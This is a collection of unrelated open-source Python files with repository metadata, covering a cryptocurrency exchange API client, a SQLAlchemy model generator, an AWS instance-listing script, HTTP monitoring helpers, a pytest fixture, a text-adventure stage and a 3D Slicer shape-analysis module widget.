'currency': currency,
'nonce': self.nonce
}
return self.request_post("user/coins/address/assign", headers=self.headers, data=payload)
def request_btc_withdrawal(self, address, amount, currency="btc"):
payload = {
'address': address,
'amount': amount,
'currency': currency,
'nonce': self.nonce
}
return self.request_post("user/coins/out", headers=self.headers, data=payload)
def status_of_btc_deposit_and_transfer(self, transfer_id="", currency="btc"):
params = {
'currency': currency
}
if transfer_id != "":
params['id'] = transfer_id
return self.request_get("user/coins/status", headers=self.headers, params=params)
def cancel_btc_transfer_request(self, transfer_id, currency="btc"):
payload = {
'id': transfer_id,
'currency': currency,
'nonce': self.nonce
}
return self.request_post("user/coins/out/cancel", headers=self.headers, data=payload)
@property
def nonce(self):
return int(time.time() * 1000)
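# A short usage sketch (hypothetical credentials; these calls would hit the
# Korbit API, so treat this as illustration rather than something to run
# blindly).
if __name__ == '__main__':
    api = PrivateAPI('my-client-id', 'my-secret', production=False)
    api.create_token_directly()        # obtain and store the OAuth2 token
    print(api.get_user_info())         # authenticated call via self.headers
    print(api.limit_bid_order(coin_amount='0.1', price='1000000'))
    print(api.list_open_orders(limit=5))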
| {
"content_hash": "f7c7674922908d0593883b262e244904",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 107,
"avg_line_length": 36.410714285714285,
"alnum_prop": 0.5883603073401994,
"repo_name": "HoonJin/korbit-python",
"id": "50b37a7c3f864dc2f5d2ad7929b7aa0ce4d70b72",
"size": "6141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "korbit/private_api.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10182"
}
],
"symlink_target": ""
} |
'''
fetch config from file/sql db
persist info to file/sql db
rotate fetching
log info, warnings, errors to file
single process
sql orm ? suitable for bulk inserts ? sqlalchemy ?
'''
# ----------------------------------------------------------------------
# load config from .ini file
from config import load_or_create_config
CONFIG_FILE_PATH = 'yfh.ini'
config = load_or_create_config(CONFIG_FILE_PATH)
if not config:
print('populate the config file settings and retry')
exit(1)
# ----------------------------------------------------------------------
from dal import postgresql, model
db_config = config['database']
credentials = model.Credential(
    host=db_config['host'],
    user=db_config['user'],
    password=db_config['password'],
    database=db_config['database']
)
new_cursor = postgresql.configure(credentials)
cursor = new_cursor()
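# A sketch answering the "suitable for bulk inserts ?" note above: plain
# DB-API executemany on the cursor, assuming a psycopg2-style cursor and a
# hypothetical `quotes` table (left commented out so importing this module
# has no side effects).
# rows = [('AAPL', 189.50), ('MSFT', 402.10)]
# cursor.executemany(
#     'INSERT INTO quotes (symbol, price) VALUES (%s, %s)', rows)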
| {
"content_hash": "0230120cb77639526066dbefde838b62",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 72,
"avg_line_length": 18.729166666666668,
"alnum_prop": 0.6040044493882091,
"repo_name": "davidbarkhuizen/yfh",
"id": "30dbd2c2d9d9e7fd57b0574ce31a2f67f296705a",
"size": "899",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "v2/daemon.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24885"
}
],
"symlink_target": ""
} |
import os.path
import sys
from config import UserConfig
config = UserConfig()
BASEDIR = config.BASEDIR
WHITE_SPACE = config.WHITE_SPACE
SQLALCHEMY_MIGRATE_REPO = config.SQLALCHEMY_MIGRATE_REPO
from controller_generator import generate_controller
def add_model(model_name, model_components):
# This is used to add a model to the model file.
# Get the current model file and open it for writing.
model_path = os.path.join(BASEDIR, "app/models/" + model_name.lower() + ".py")
init_path = os.path.join(BASEDIR, "app/models/__init__.py")
model_file = open(model_path, 'w')
# Write the class definition.
model_file.write('from app import db\n')
model_file.write('from helpers import json_date_format\n\n')
model_file.write('class ' + model_name.title() + '(db.Model):\n')
model_file.write(WHITE_SPACE+'id = db.Column(db.Integer, primary_key=True)\n')
## Add the model fields.
### First check the data types and standardize them.
### The database field types are based on
### http://docs.sqlalchemy.org/en/rel_0_7/core/types.html#types-generic.
sqlalchemy_types = {
    'biginteger': 'BigInteger', 'bigint': 'BigInteger',
    'binary': 'Binary',
    'blob': 'BLOB',
    'boolean': 'Boolean',
    'date': 'Date',
    'datetime': 'DateTime',
    'enum': 'Enum',
    'float': 'Float',
    'int': 'Integer', 'integer': 'Integer',
    'interval': 'Interval',
    'largebinary': 'LargeBinary',
    'numeric': 'Numeric',
    'pickletype': 'PickleType',
    'schematype': 'SchemaType',
    'smallinteger': 'SmallInteger', 'smallint': 'SmallInteger',
    'string': 'String',
    'text': 'Text',
    'time': 'Time',
    'unicode': 'Unicode',
    'unicodetext': 'UnicodeText',
}
for component in model_components:
    in_type = component['field_property'][0].lower()
    data_type = sqlalchemy_types.get(in_type)
    if data_type is None:
        ### If the data type did not match any of the existing data types,
        ### display an error message and quit the program.
        print('Data type ' + component['field_property'][0] + ' not found. '
              'Please refer to the SQLAlchemy documentation for valid data types.')
        sys.exit()
    ### If it matches, write the model fields into the model file.
if len(component['field_property']) == 2:
model_file.write(WHITE_SPACE + component['field_name'].lower() + ' = db.Column(db.' + data_type + '(' + component['field_property'][1] + '))\n')
else:
model_file.write(WHITE_SPACE + component['field_name'].lower() + ' = db.Column(db.' + data_type + ')\n')
model_file.write(WHITE_SPACE + 'created_on = db.Column(db.DateTime)\n')
model_file.write(WHITE_SPACE + 'last_updated_on = db.Column(db.DateTime)\n')
## Create the class method for data transfer object (dto) for JSON representation.
model_file.write('\n')
model_file.write(WHITE_SPACE + '# data transfer object to form JSON\n')
model_file.write(WHITE_SPACE + 'def dto(self):\n')
model_file.write(WHITE_SPACE + WHITE_SPACE + 'return dict(\n')
### Add the json component for all fields.
model_file.write(WHITE_SPACE+WHITE_SPACE+WHITE_SPACE+'id = self.id,\n')
for component in model_components:
model_file.write(WHITE_SPACE + WHITE_SPACE + WHITE_SPACE + component['field_name'].lower() + ' = self.' + component['field_name'].lower() + ',\n')
model_file.write(WHITE_SPACE+WHITE_SPACE+WHITE_SPACE+'created_on = json_date_format(self.created_on),\n')
model_file.write(WHITE_SPACE+WHITE_SPACE+WHITE_SPACE+'last_updated_on = json_date_format(self.last_updated_on))\n')
model_file.close()
init_file = open(init_path, 'a')
init_file.write("from "+ model_name.lower() + " import " + model_name.title()+"\n")
init_file.close()
print('\n' + model_name + ' tree seed planted in the greenhouse\n')
if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):
    print("If you're done, please run yard shove to complete the database creation")
else:
    print("If you're done, please run yard water to complete the database creation")
# end of file
| {
"content_hash": "7afc342585d1fcfe05407a0313ba86c4",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 156,
"avg_line_length": 41.52136752136752,
"alnum_prop": 0.6105393165911898,
"repo_name": "femmerling/backyard",
"id": "0194d9da1510b31add39678c85aac87dd5c434f7",
"size": "4858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gardener/model_generator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "135019"
}
],
"symlink_target": ""
} |
from cgnaws import *
import sys
with open("/root/.aws/config") as f:
for line in f.readlines():
if line.startswith('aws_access_key_id'):
aws_access_key_id = line.split()[-1]
elif line.startswith('aws_secret_access_key'):
aws_secret_access_key = line.split()[-1]
accounts = { 'bdoss' : { 'regions': ['us-east-1'], 'access-key' : aws_access_key_id, 'secret-key' : aws_secret_access_key} }
def main():
if len(sys.argv) != 1:
search_string = sys.argv[1]
else:
search_string = None
connections = establish_connections(accounts)
reservations = get_reservations(connections)
instances = get_instances(reservations)
print_instances_info(get_instances_info(instances),search_string)
if __name__ == '__main__':
main()
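# A sketch of the same credential lookup using the standard library instead
# of hand-parsing lines (assumes the usual [default] section in the config
# file; `configparser` is the Python 3 module name).
def read_aws_credentials(path='/root/.aws/config', section='default'):
    import configparser
    cp = configparser.ConfigParser()
    cp.read(path)
    return (cp.get(section, 'aws_access_key_id'),
            cp.get(section, 'aws_secret_access_key'))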
| {
"content_hash": "e89d76328b0767c574c526fd8b42c491",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 124,
"avg_line_length": 33.333333333333336,
"alnum_prop": 0.6275,
"repo_name": "stealthly/minotaur",
"id": "b318369d8f5c8578560d9331e6267e84c22fecd2",
"size": "1606",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "supervisor/scripts/cgnaws/awsinfo.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "13236"
},
{
"name": "Python",
"bytes": "84611"
},
{
"name": "Ruby",
"bytes": "163927"
},
{
"name": "Shell",
"bytes": "68285"
}
],
"symlink_target": ""
} |
import datetime
import json
from typing import Dict, Optional
import arrow
import flask
import requests
import yaml
from yaml.representer import Representer
from monitoring.monitorlib import infrastructure
TIMEOUTS = (5, 25) # Timeouts of `connect` and `read` in seconds
def coerce(obj: Dict, desired_type: type):
if isinstance(obj, desired_type):
return obj
else:
return desired_type(obj)
class RequestDescription(dict):
@property
def token(self) -> Dict:
return infrastructure.get_token_claims(self.get("headers", {}))
@property
def timestamp(self) -> datetime.datetime:
if "initiated_at" in self:
# This was an outgoing request
return arrow.get(self["initiated_at"]).datetime
elif "received_at" in self:
# This was an incoming request
return arrow.get(self["received_at"]).datetime
else:
raise KeyError(
"RequestDescription missing both initiated_at and received_at"
)
yaml.add_representer(RequestDescription, Representer.represent_dict)
def describe_flask_request(request: flask.Request) -> RequestDescription:
headers = {k: v for k, v in request.headers}
info = {
"method": request.method,
"url": request.url,
"received_at": datetime.datetime.utcnow().isoformat(),
"headers": headers,
}
try:
info["json"] = request.json
except ValueError:
info["body"] = request.data.encode("utf-8")
return RequestDescription(info)
def describe_request(
req: requests.PreparedRequest, initiated_at: datetime.datetime
) -> RequestDescription:
headers = {k: v for k, v in req.headers.items()}
info = {
"method": req.method,
"url": req.url,
"initiated_at": initiated_at.isoformat(),
"headers": headers,
}
body = req.body.decode("utf-8") if req.body else None
try:
if body:
info["json"] = json.loads(body)
else:
info["body"] = body
except ValueError:
info["body"] = body
return RequestDescription(info)
class ResponseDescription(dict):
@property
def status_code(self) -> int:
return self["code"] if self.get("code") is not None else 999
@property
def reported(self) -> datetime.datetime:
return arrow.get(self["reported"]).datetime
yaml.add_representer(ResponseDescription, Representer.represent_dict)
def describe_response(resp: requests.Response) -> ResponseDescription:
headers = {k: v for k, v in resp.headers.items()}
info = {
"code": resp.status_code,
"headers": headers,
"elapsed_s": resp.elapsed.total_seconds(),
"reported": datetime.datetime.utcnow().isoformat(),
}
try:
info["json"] = resp.json()
except ValueError:
info["body"] = resp.content.decode("utf-8")
return ResponseDescription(info)
class Query(dict):
@property
def request(self) -> RequestDescription:
return coerce(self["request"], RequestDescription)
@property
def response(self) -> ResponseDescription:
return coerce(self["response"], ResponseDescription)
@property
def status_code(self) -> int:
return self.response.status_code
@property
def json_result(self) -> Optional[Dict]:
return self.response.get("json", None)
yaml.add_representer(Query, Representer.represent_dict)
def describe_query(resp: requests.Response, initiated_at: datetime.datetime) -> Query:
return Query(
{
"request": describe_request(resp.request, initiated_at),
"response": describe_response(resp),
}
)
def query_and_describe(
client: infrastructure.UTMClientSession, method: str, url: str, **kwargs
) -> Query:
req_kwargs = kwargs.copy()
req_kwargs["timeout"] = TIMEOUTS
t0 = datetime.datetime.utcnow()
try:
return describe_query(client.request(method, url, **req_kwargs), t0)
except requests.RequestException as e:
msg = "{}: {}".format(type(e).__name__, str(e))
t1 = datetime.datetime.utcnow()
# Reconstruct request similar to the one in the query (which is not
# accessible at this point)
del req_kwargs["timeout"]
req_kwargs = client.adjust_request_kwargs(req_kwargs)
req = requests.Request(method, url, **req_kwargs)
prepped_req = client.prepare_request(req)
return Query(
{
"request": describe_request(prepped_req, t0),
"response": ResponseDescription(
{
"code": None,
"failure": msg,
"elapsed_s": (t1 - t0).total_seconds(),
"reported": t1,
}
),
}
)
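# A short usage sketch (hypothetical URL): wrap any requests.Response in a
# Query so the request/response pair can be inspected or dumped as YAML.
if __name__ == "__main__":
    t0 = datetime.datetime.utcnow()
    resp = requests.get("https://example.com/status", timeout=TIMEOUTS)
    query = describe_query(resp, t0)
    print(query.status_code)
    print(yaml.dump(query))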
| {
"content_hash": "20d8e7dee7b2b29ccea6e48a3b61b8ee",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 86,
"avg_line_length": 28.370588235294118,
"alnum_prop": 0.6184947128343354,
"repo_name": "interuss/dss",
"id": "740b84b6979feaba6d8387d83ab05122a77285de",
"size": "4823",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "monitoring/monitorlib/fetch/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "518"
},
{
"name": "Dockerfile",
"bytes": "6594"
},
{
"name": "Go",
"bytes": "583387"
},
{
"name": "HTML",
"bytes": "20494"
},
{
"name": "Jsonnet",
"bytes": "601530"
},
{
"name": "Makefile",
"bytes": "10609"
},
{
"name": "PLpgSQL",
"bytes": "4759"
},
{
"name": "Python",
"bytes": "948652"
},
{
"name": "Shell",
"bytes": "76140"
}
],
"symlink_target": ""
} |
import pytest
from hypr import Hypr
from test_tools import cp_provider_factory
@pytest.fixture(scope='class')
def app(request):
app = Hypr(__name__)
for provider, urls in request.cls.providers.items():
if isinstance(provider, str):
provider = getattr(
request.module,
provider,
type(provider, (cp_provider_factory(),), {})
)
if not isinstance(urls, tuple):
urls = urls,
app.router.add_provider(provider, *urls)
app.propagate()
return app
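# A usage sketch (hypothetical provider name and URLs): test classes declare
# a `providers` mapping, which the fixture above resolves against the test
# module and registers on the app's router.
class ExampleProviderUsage:
    providers = {'MyProvider': ('/my', '/my/<id>')}

    def test_app_is_configured(self, app):
        assert app is not None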
| {
"content_hash": "dc4dee8897ce7fcc15f28a5589400697",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 60,
"avg_line_length": 22.76,
"alnum_prop": 0.5746924428822495,
"repo_name": "project-hypr/hypr",
"id": "65c471a033ce5a42c5303a3a0f6ba1c9f6b10e65",
"size": "569",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/security/checkpoint/conftest.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "144944"
}
],
"symlink_target": ""
} |
"""london_abbey.py"""
from lib.stage import Stage
class LondonAbbey(Stage):
"""London Abbey stage"""
def desc(self):
"""Describe action"""
action = """
After getting the second replicant, you search on Google and find that there
are some people talking about a strange royal guard that arrests people for
telling good jokes. You take the next ship to London and step into a fancy
old abbey. There is no one around and a comfortable silence...
"""
self.console.simulate_typing(action)
def look(self):
"""Look action"""
action = """
You look around, there are some guards and everything looks royal...
"""
self.console.simulate_typing(action)
def talk(self):
"""Talk action"""
action = """
You talk to a royal guard, but they are famous for not giving a shit about it...
"""
self.console.simulate_typing(action)
def joke(self):
"""Joke action"""
action = """
You drop an epic joke, almost every guard laughs...
"""
self.console.simulate_typing(action)
def fight(self):
"""Fight action"""
action = """
It's not a good idea to fight inside an abbey, so barbaric...
"""
self.console.simulate_typing(action)
| {
"content_hash": "db8026322d5e0f4adba62275cd9163c5",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 75,
"avg_line_length": 24.96,
"alnum_prop": 0.6330128205128205,
"repo_name": "brunitto/python-runner",
"id": "16a9a7062dc500f8b2708cedd6780e830ff0cafc",
"size": "1248",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/stages/london_abbey.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16067"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os, sys
import unittest
from pathlib import Path
import vtk, qt, ctk, slicer
from slicer.ScriptedLoadableModule import *
import logging
import csv
from slicer.util import VTKObservationMixin
import platform
import time
from RigidAlignmentModule import RigidAlignmentModuleLogic
try:
import urllib.request, urllib.parse, urllib.error
except ImportError:
import urllib # python 2.x
import shutil
from CommonUtilities import *
from packaging import version
def _setSectionResizeMode(header, *args, **kwargs):
if version.parse(qt.Qt.qVersion()) < version.parse("5.0.0"):
header.setResizeMode(*args, **kwargs)
else:
header.setSectionResizeMode(*args, **kwargs)
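# Example (sketch): given a QHeaderView, a section index and a resize mode,
# the shim above picks the Qt4- or Qt5-era method name, e.g.
#   _setSectionResizeMode(table.horizontalHeader(), 0, qt.QHeaderView.Stretch)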
#
# ShapeAnalysisModule
#
class ShapeAnalysisModule(ScriptedLoadableModule):
"""Uses ScriptedLoadableModule base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
self.parent.title = "Shape Analysis Module"
self.parent.categories = ["SPHARM"]
self.parent.dependencies = []
self.parent.contributors = ["Laura Pascal (Kitware Inc.), Beatriz Paniagua (Kitware Inc.), Hina Shah (Kitware Inc.)"]
self.parent.helpText = """
SPHARM-PDM is a tool that computes point-based models using a parametric
boundary description for the computing of Shape Analysis.
"""
self.parent.acknowledgementText = """
This work was supported by NIH NIBIB R01EB021391
(Shape Analysis Toolbox for Medical Image Computing Projects).
"""
#
# ShapeAnalysisModuleWidget
#
class ShapeAnalysisModuleWidget(ScriptedLoadableModuleWidget):
"""Uses ScriptedLoadableModuleWidget base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setup(self):
ScriptedLoadableModuleWidget.setup(self)
#
# Global variables
#
self.Logic = ShapeAnalysisModuleLogic()
self.progressbars_layout = None
#
# Interface
#
loader = qt.QUiLoader()
self.moduleName = 'ShapeAnalysisModule'
scriptedModulesPath = eval('slicer.modules.%s.path' % self.moduleName.lower())
scriptedModulesPath = os.path.dirname(scriptedModulesPath)
path = os.path.join(scriptedModulesPath, 'Resources', 'UI', '%s.ui' % self.moduleName)
qfile = qt.QFile(path)
qfile.open(qt.QFile.ReadOnly)
widget = loader.load(qfile, self.parent)
self.layout = self.parent.layout()
self.widget = widget
self.layout.addWidget(widget)
# Global variables of the Interface
# Group Project IO
self.CollapsibleButton_GroupProjectIO = self.getWidget('CollapsibleButton_GroupProjectIO')
self.GroupProjectInputDirectory = self.getWidget('DirectoryButton_GroupProjectInputDirectory')
self.GroupProjectOutputDirectory = self.getWidget('DirectoryButton_GroupProjectOutputDirectory')
self.Debug = self.getWidget('checkBox_Debug')
# Post Processed Segmentation
self.CollapsibleButton_SegPostProcess = self.getWidget('CollapsibleButton_SegPostProcess')
self.OverwriteSegPostProcess = self.getWidget('checkBox_OverwriteSegPostProcess')
self.label_RescaleSegPostProcess = self.getWidget('label_RescaleSegPostProcess')
self.RescaleSegPostProcess = self.getWidget('checkBox_RescaleSegPostProcess')
self.sx = self.getWidget('SliderWidget_sx')
self.sy = self.getWidget('SliderWidget_sy')
self.sz = self.getWidget('SliderWidget_sz')
self.label_sx = self.getWidget('label_sx')
self.label_sy = self.getWidget('label_sy')
self.label_sz = self.getWidget('label_sz')
self.LabelState = self.getWidget('checkBox_LabelState')
self.label_ValueLabelNumber = self.getWidget('label_ValueLabelNumber')
self.ValueLabelNumber = self.getWidget('SliderWidget_ValueLabelNumber')
# Generate Mesh Parameters
self.CollapsibleButton_GenParaMesh = self.getWidget('CollapsibleButton_GenParaMesh')
self.OverwriteGenParaMesh = self.getWidget('checkBox_OverwriteGenParaMesh')
self.NumberofIterations = self.getWidget('SliderWidget_NumberofIterations')
# Parameters to SPHARM Mesh
self.CollapsibleButton_ParaToSPHARMMesh = self.getWidget('CollapsibleButton_ParaToSPHARMMesh')
self.OverwriteParaToSPHARMMesh = self.getWidget('checkBox_OverwriteParaToSPHARMMesh')
self.SubdivLevelValue = self.getWidget('SliderWidget_SubdivLevelValue')
self.SPHARMDegreeValue = self.getWidget('SliderWidget_SPHARMDegreeValue')
self.thetaIterationValue = self.getWidget('spinBox_thetaIterationValue')
self.phiIterationValue = self.getWidget('spinBox_phiIterationValue')
self.medialMesh = self.getWidget('checkBox_medialMesh')
# Advanced Post Processed Segmentation
self.CollapsibleButton_AdvancedPostProcessedSegmentation = self.getWidget(
'CollapsibleButton_AdvancedPostProcessedSegmentation')
self.GaussianFiltering = self.getWidget('checkBox_GaussianFiltering')
self.label_VarianceX = self.getWidget('label_VarianceX')
self.VarianceX = self.getWidget('SliderWidget_VarianceX')
self.label_VarianceY = self.getWidget('label_VarianceY')
self.VarianceY = self.getWidget('SliderWidget_VarianceY')
self.label_VarianceZ = self.getWidget('label_VarianceZ')
self.VarianceZ = self.getWidget('SliderWidget_VarianceZ')
# Advanced Parameters to SPHARM Mesh
self.CollapsibleButton_AdvancedParametersToSPHARMMesh = self.getWidget(
'CollapsibleButton_AdvancedParametersToSPHARMMesh')
self.useRegTemplate = self.getWidget('checkBox_useRegTemplate')
self.label_regTemplate = self.getWidget('label_regTemplate')
self.regTemplate = self.getWidget('PathLineEdit_regTemplate')
self.useFlipTemplate = self.getWidget('checkBox_useFlipTemplate')
self.label_flipTemplate = self.getWidget('label_flipTemplate')
self.flipTemplate = self.getWidget('PathLineEdit_flipTemplate')
self.choiceOfFlip = self.getWidget('comboBox_choiceOfFlip')
self.sameFlipForAll = self.getWidget('checkBox_sameFlipForAll')
self.tableWidget_ChoiceOfFlip = self.getWidget('tableWidget_ChoiceOfFlip')
# Correspondence Improvement
self.CollapsibleButton_RigidAlignment = self.getWidget('CollapsibleButton_RigidAlignment')
self.RigidAlignmentFiducialsDirectory = self.getWidget('DirectoryButton_RigidAlignmentFiducialsDirectory')
self.RigidAlignmentEnabled = self.getWidget('checkBox_RigidAlignmentEnabled')
# Visualization
self.CollapsibleButton_Visualization = self.getWidget('CollapsibleButton_Visualization')
self.visualizationInSPV = self.getWidget('pushButton_visualizationInSPV')
self.CheckableComboBox_visualization = self.getWidget('CheckableComboBox_visualization')
self.tableWidget_visualization = self.getWidget('tableWidget_visualization')
# Apply CLIs
self.ApplyButton = self.getWidget('applyButton')
self.progress_layout = self.getWidget('progress_layout').layout()
# Connections
# Group Project IO
self.CollapsibleButton_GroupProjectIO.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_GroupProjectIO))
self.GroupProjectInputDirectory.connect('directoryChanged(const QString &)', self.onInputDirectoryChanged)
self.GroupProjectOutputDirectory.connect('directoryChanged(const QString &)', self.onOutputDirectoryChanged)
self.Debug.connect('clicked(bool)', self.onDebug)
# Post Processed Segmentation
self.CollapsibleButton_SegPostProcess.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_SegPostProcess))
self.OverwriteSegPostProcess.connect('clicked(bool)', self.onOverwriteFilesSegPostProcess)
self.RescaleSegPostProcess.connect('stateChanged(int)', self.onSelectSpacing)
self.sx.connect('valueChanged(double)', self.onSxValueChanged)
self.sy.connect('valueChanged(double)', self.onSyValueChanged)
self.sz.connect('valueChanged(double)', self.onSzValueChanged)
self.LabelState.connect('clicked(bool)', self.onSelectValueLabelNumber)
self.ValueLabelNumber.connect('valueChanged(double)', self.onLabelNumberValueChanged)
# Generate Mesh Parameters
self.CollapsibleButton_GenParaMesh.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_GenParaMesh))
self.OverwriteGenParaMesh.connect('clicked(bool)', self.onOverwriteFilesGenParaMesh)
self.NumberofIterations.connect('valueChanged(double)', self.onNumberofIterationsValueChanged)
# Parameters to SPHARM Mesh
self.CollapsibleButton_ParaToSPHARMMesh.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_ParaToSPHARMMesh))
self.OverwriteParaToSPHARMMesh.connect('clicked(bool)', self.onOverwriteFilesParaToSPHARMMesh)
self.SubdivLevelValue.connect('valueChanged(double)', self.onSubdivLevelValueChanged)
self.SPHARMDegreeValue.connect('valueChanged(double)', self.onSPHARMDegreeValueChanged)
self.thetaIterationValue.connect('valueChanged(int)', self.onThetaIterationValueChanged)
self.phiIterationValue.connect('valueChanged(int)', self.onPhiIterationValueChanged)
self.medialMesh.connect('clicked(bool)', self.onMedialMeshValueChanged)
# Advanced Post Processed Segmentation
self.CollapsibleButton_AdvancedPostProcessedSegmentation.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_AdvancedPostProcessedSegmentation))
self.GaussianFiltering.connect('clicked(bool)', self.onSelectGaussianVariance)
self.VarianceX.connect('valueChanged(double)', self.onVarianceXValueChanged)
self.VarianceY.connect('valueChanged(double)', self.onVarianceYValueChanged)
self.VarianceZ.connect('valueChanged(double)', self.onVarianceZValueChanged)
# Advanced Parameters to SPHARM Mesh
self.CollapsibleButton_AdvancedParametersToSPHARMMesh.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_AdvancedParametersToSPHARMMesh))
self.useRegTemplate.connect('clicked(bool)', self.onEnableRegTemplate)
self.regTemplate.connect('currentPathChanged(const QString)', self.onRegTemplateValueChanged)
self.useFlipTemplate.connect('clicked(bool)', self.onEnableFlipTemplate)
self.flipTemplate.connect('currentPathChanged(const QString)', self.onFlipTemplateValueChanged)
self.choiceOfFlip.connect('currentIndexChanged(int)', self.onChoiceOfFlipValueChanged)
self.sameFlipForAll.connect('clicked(bool)', self.onEnableFlipChoices)
# Correspondence Improvement
self.CollapsibleButton_RigidAlignment.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_RigidAlignment))
self.RigidAlignmentFiducialsDirectory.connect('directoryChanged(const QString &)', self.onFiducialsDirectoryChanged)
self.RigidAlignmentEnabled.connect('stateChanged(int)', self.onEnableRigidAlignment)
# Visualization
self.CollapsibleButton_Visualization.connect('clicked()',
lambda: self.onSelectedCollapsibleButtonOpen(
self.CollapsibleButton_Visualization))
self.CheckableComboBox_visualization.connect('checkedIndexesChanged()', self.onCheckableComboBoxValueChanged)
self.visualizationInSPV.connect('clicked(bool)', self.onSPHARMMeshesVisualizationInSPV)
# Apply CLIs
self.ApplyButton.connect('clicked(bool)', self.onApplyButton)
slicer.mrmlScene.AddObserver(slicer.mrmlScene.EndCloseEvent, self.onCloseScene)
# Widget Configuration
# Table for the Flip Options
self.tableWidget_ChoiceOfFlip.setColumnCount(2)
self.tableWidget_ChoiceOfFlip.setHorizontalHeaderLabels([' Input Files ', ' Choice of Flip '])
self.tableWidget_ChoiceOfFlip.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_ChoiceOfFlip.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_ChoiceOfFlip.verticalHeader().setVisible(False)
# Progress Bar
self.progress_layout.addWidget(self.Logic.ProgressBar)
# Table for the visualization in SPV
self.tableWidget_visualization.setColumnCount(2)
self.tableWidget_visualization.setHorizontalHeaderLabels([' VTK Files ', ' Visualization '])
self.tableWidget_visualization.setColumnWidth(0, 400)
horizontalHeader = self.tableWidget_visualization.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
self.tableWidget_visualization.verticalHeader().setVisible(False)
# Configuration of the parameters of the widget
self.Logic.parameters.setTableForChoiceOfFlip(self.tableWidget_ChoiceOfFlip)
def enter(self):
if not hasattr(slicer.modules, 'shapepopulationviewer') and not hasattr(slicer.modules, 'launcher'):
messageBox = ctk.ctkMessageBox()
messageBox.setWindowTitle(' /!\ WARNING /!\ ')
messageBox.setIcon(messageBox.Warning)
messageBox.setText("Shape Population Viewer is not installed!")
messageBox.setInformativeText("In order to display the SPHARM outputs generated by Shape Analysis Module, "\
"you can install it via the extensions manager and restart 3D Slicer")
messageBox.setStandardButtons(messageBox.Ok)
messageBox.exec_()
else:
self.CollapsibleButton_Visualization.enabled = True
def onCloseScene(self, obj, event):
# Group Project IO
self.CollapsibleButton_GroupProjectIO.setChecked(True)
self.Logic.InputCases = []
self.GroupProjectInputDirectory.directory = slicer.app.slicerHome
self.GroupProjectOutputDirectory.directory = slicer.app.slicerHome
self.Debug.setChecked(False)
# Post Processed Segmentation
self.CollapsibleButton_SegPostProcess.setChecked(False)
self.OverwriteSegPostProcess.setChecked(False)
self.RescaleSegPostProcess.setChecked(True)
self.sx.setValue(0.5)
self.sy.setValue(0.5)
self.sz.setValue(0.5)
self.LabelState.setChecked(False)
self.ValueLabelNumber.setValue(0)
# Generate Mesh Parameters
self.CollapsibleButton_GenParaMesh.setChecked(False)
self.OverwriteGenParaMesh.setChecked(False)
self.NumberofIterations.setValue(1000)
# Parameters to SPHARM Mesh
self.CollapsibleButton_ParaToSPHARMMesh.setChecked(False)
self.OverwriteParaToSPHARMMesh.setChecked(False)
self.SubdivLevelValue.setValue(10)
self.SPHARMDegreeValue.setValue(15)
self.thetaIterationValue.setValue(100)
self.phiIterationValue.setValue(100)
self.medialMesh.setChecked(False)
# Advanced Post Processed Segmentation
self.CollapsibleButton_AdvancedPostProcessedSegmentation.setChecked(False)
self.GaussianFiltering.setChecked(False)
self.VarianceX.setValue(10)
self.VarianceY.setValue(10)
self.VarianceZ.setValue(10)
# Advanced Parameters to SPHARM Mesh
self.CollapsibleButton_AdvancedParametersToSPHARMMesh.setChecked(False)
self.useRegTemplate.setChecked(False)
self.regTemplate.setCurrentPath(" ")
self.useFlipTemplate.setChecked(False)
self.flipTemplate.setCurrentPath(" ")
self.choiceOfFlip.setCurrentIndex(0)
self.choiceOfFlip.enabled = True
self.sameFlipForAll.setChecked(True)
self.tableWidget_ChoiceOfFlip.enabled = False
